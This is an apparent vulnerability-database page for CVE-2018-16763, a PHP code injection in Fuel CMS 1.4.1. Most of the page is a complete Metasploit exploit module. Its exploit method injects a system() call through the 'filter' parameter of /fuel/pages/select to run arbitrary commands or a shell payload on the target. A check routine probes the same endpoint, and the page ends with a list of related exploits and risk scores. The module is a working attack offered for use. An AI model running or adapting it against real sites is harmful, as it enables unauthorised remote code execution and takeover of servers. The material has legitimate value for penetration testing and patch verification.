📄 Fuel CMS 1.4.1 PHP Code Injection

🗓️ 11 May 2026 00:00:00Reported by indoushkaType

Fuel CMS 1.4.1 remote code execution via eval in filter parameter.

Reporter	Title	Published	Views	Family All 26
0day.today	fuelCMS 1.4.1 - Remote Code Execution Exploit	20 Jul 201900:00	–	zdt
0day.today	Fuel CMS 1.4.1 - Remote Code Execution Exploit (3)	3 Nov 202100:00	–	zdt
GithubExploit	Exploit for Injection in Thedaylightstudio Fuel_Cms	10 Oct 202020:23	–	githubexploit
GithubExploit	Exploit for Injection in Thedaylightstudio Fuel_Cms	31 May 202215:31	–	githubexploit
GithubExploit	Exploit for Injection in Thedaylightstudio Fuel_Cms	10 Oct 202020:23	–	githubexploit
GithubExploit	Exploit for Injection in Thedaylightstudio Fuel_Cms	3 Nov 202104:38	–	githubexploit
GithubExploit	Exploit for Injection in Thedaylightstudio Fuel_Cms	9 Apr 202622:37	–	githubexploit
ATTACKERKB	CVE-2018-16763	9 Sep 201800:00	–	attackerkb
Circl	CVE-2018-16763	13 Jul 202213:02	–	circl
Check Point Advisories	FUEL CMS Remote Code Execution (CVE-2018-16763)	31 May 202000:00	–	checkpoint_advisories

==================================================================================================================================
    | # Title     : Fuel CMS 1.4.1 PHP Code Injection RCE Exploit                                                                    |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.getfuelcms.com/                                                                                      |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit module targets a Remote Code Execution (CVE-2018-16763) vulnerability in Fuel CMS version 1.4.1. 
                     The issue stems from improper input sanitization in the filter parameter, which is passed into a dangerous PHP evaluation context (eval()), enabling code injection.
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      prepend Msf::Exploit::Remote::AutoCheck
      include Msf::Exploit::Remote::HttpClient
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name'           => 'Fuel CMS 1.4.1 - Remote Code Execution (RCE)',
            'Description'    => %q{
             This mod exploits a PHP code injection vulnerability in Fuel CMS version 1.4.1.
             The vulnerability arises because unfiltered input is passed to the eval() function, allowing remote system command execution.
            },
            'Author'         => ['indoushka'],
            'License'        => MSF_LICENSE,
            'References'     => [
              ['CVE', '2018-16763'],
              ['URL', 'https://github.com/0xmrsecurity/Public_Poc/tree/main/CVE-2018-16763']
            ],
            'Privileged'     => false,
            'Platform'       => ['linux', 'unix'],
            'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
            'Payload'        => {
              'BadChars' => "\x22"
            },
            'Targets'        => [
              ['Fuel CMS 1.4.1', {}]
            ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => '2018-09-17',
            'Notes'          => {
              'Stability'   => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [IOC_IN_LOGS]
            }
          )
        )
    
        register_options(
          [
            OptString.new('TARGETURI', [true, 'Fuel CMS', '/'])
          ]
        )
      end
    
      def check
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => normalize_uri(target_uri.path, 'fuel', 'pages', 'select'),
          'vars_get' => {
            'filter' => "'+pi(print(2026*2))+'"
          }
        })
    
        return CheckCode::Vulnerable if res && res.body.include?('4052')
        CheckCode::Safe
      end
    
      def exploit
       print_status("Payload being sent to the target...")
    
        cmd = Rex::Text.uri_encode(payload.encoded)
    
        shell_payload = "'+pi(print($a='system'))+$a('#{cmd}')+'"
    
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => normalize_uri(target_uri.path, 'fuel', 'pages', 'select'),
          'vars_get' => {
            'filter' => shell_payload
          }
        })
    
        if res && res.code == 200
          print_good("The order was successfully sent.")
        else
         print_error("Connection failed or target is not infected.")
        end
      end
    end
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

11 May 2026 00:00Current

7.9High risk

Vulners AI Score7.9

CVSS 27.5

CVSS 3.19.8

EPSS0.9391